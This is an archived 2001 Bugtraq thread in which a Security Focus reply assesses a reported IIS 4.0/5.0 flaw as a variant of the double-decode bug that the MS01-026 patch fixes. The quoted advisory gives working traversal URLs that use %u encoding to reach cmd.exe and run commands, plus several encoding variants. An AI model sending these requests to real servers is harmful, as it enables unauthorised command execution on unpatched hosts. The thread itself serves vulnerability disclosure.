Bugtraq mailing list archives
Re: New vulnerability in IIS4.0/5.0
From: Dave Ahmad <da () securityfocus com>
Date: Wed, 19 Sep 2001 13:50:02 -0600 (MDT)
This seems to be just be another way to exploit the double decode vulnerability (Bugtraq ID 2708). There is a possibility that it may be a new issue due to the use of '%u' method of encoding. It does not look that way to us. On our test machines (and at eEye), systems do not seem to be vulnerable after applying the MS01-026 hotfix (or the MS01-044 patch). Ryan Permeh of eEye Digital Security provided a breakdown of an encoded attack string: The attack string used successfully against an IIS server (Win2K, SP2): http://localhost/scripts/..%u0025u005c..%u0025u005cwinnt/system32/cmd.exe?/c +dir+c:\ first decode sequence(it replaces %u0025 with %) http://localhost/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\ second decode sequence (it replaces %u005c with /) http://localhost/scripts/../../winnt/system32/cmd.exe?/c+dir+c:\ The double decode vulnerability is fixed in MS01-026. I believe the fix is included in the cumulative patch released with MS01-044. It doesn't look like a new vulnerability, but we are awaiting confirmation from Microsoft. Has anyone managed to exploit a patched system? Thanks Ryan & eEye. Regards, Dave Ahmad Security Focus www.securityfocus.com On Wed, 19 Sep 2001, ALife // BERG wrote:
-----[ Bright Eyes Research Group | Advisory # be00001e ]----------------- Remote users can execute any command on several IIS 4.0 and 5.0 systems by using UTF codes -------------------------------------[ security.instock.ru ]-------------- Topic: Remote users can execute any command on several IIS 4.0 and 5.0 systems by using UTF codes Announced: 2001-09-19 Credits: ALife <buginfo () inbox ru> Affects: Microsoft IIS 4.0/5.0 -------------------------------------------------------------------------- ---[ Description For example, target has a virtual executable directory (e.g. "scripts") that is located on the same driver of Windows system. Submit request like this: http://target/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\ Directory list of C:\ will be revealed. Of course, same effect can be achieved by this kind of processing to '/' and '.'. For example: "..%u002f", ".%u002e/", "..%u00255c", "..%u0025%u005c" ... Note: Attacker can run commands of IUSR_machinename account privilege only.
Current thread:
- New vulnerability in IIS4.0/5.0 ALife // BERG (Sep 19)
- Re: New vulnerability in IIS4.0/5.0 Dave Ahmad (Sep 19)
- Re: New vulnerability in IIS4.0/5.0 César González (Sep 19)
- ICQ WEB Portal multiple Cross Site Scripting vulnerability acz [iSecureLabs] (Sep 20)
- Re: New vulnerability in IIS4.0/5.0 Paul McGovern (Sep 21)
- Re: New vulnerability in IIS4.0/5.0 César González (Sep 19)
- Re: New vulnerability in IIS4.0/5.0 C?sar Gonz?lez (Sep 19)
- <Possible follow-ups>
- RE: New vulnerability in IIS4.0/5.0 Microsoft Security Response Center (Sep 20)
- Re: New vulnerability in IIS4.0/5.0 Dave Ahmad (Sep 19)